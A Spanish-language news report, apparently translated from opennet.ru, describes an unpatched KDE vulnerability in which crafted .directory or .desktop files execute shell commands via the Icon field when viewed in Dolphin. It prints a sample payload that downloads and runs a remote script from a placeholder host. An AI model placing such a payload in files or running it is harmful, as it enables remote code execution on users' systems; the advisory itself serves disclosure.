Vulnerabilidad de ejecución de código de KDE al visualizar una lista de archivos

En KDE identificado vulnerabilidad, que permite a un atacante ejecutar comandos arbitrarios cuando un usuario ve un directorio o archivo que contiene archivos “.desktop” y “.directory” especialmente diseñados. Un ataque requiere que el usuario simplemente vea una lista de archivos en el administrador de archivos Dolphin, descargue un archivo de escritorio malicioso o arrastre un acceso directo al escritorio o a un documento. El problema se manifiesta en la versión actual de las bibliotecas. KDE Frameworks 5.60.0 y versiones anteriores, hasta KDE 4. La vulnerabilidad aún está permanece sin corregir (CVE no asignado).

El problema es causado por una implementación incorrecta de la clase KDesktopFile, que, al procesar la variable "Icon", sin el escape adecuado, pasa el valor a la función KConfigPrivate::expandString(), que realiza la expansión de los caracteres especiales del shell, incluido el procesamiento. las cadenas “$(..)” como comandos a ejecutar. Contrariamente a los requisitos de la especificación XDG, la implementación divulgar Las construcciones de shell se producen sin separar el tipo de configuraciones, es decir. no sólo a la hora de determinar la línea de comando de la aplicación a ejecutar, sino también a la hora de especificar los iconos que se muestran por defecto.

Por ejemplo, atacar suficiente envíe al usuario un archivo zip con un directorio que contenga un archivo “.directorio” como este:

[Entrada de escritorio] Tipo=Directorio
Icono[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

Cuando intente ver el contenido del archivo en el administrador de archivos Dolphin, se descargará y ejecutará el script https://example.com/FILENAME.sh.


Fuente: opennet.ru

Añadir un comentario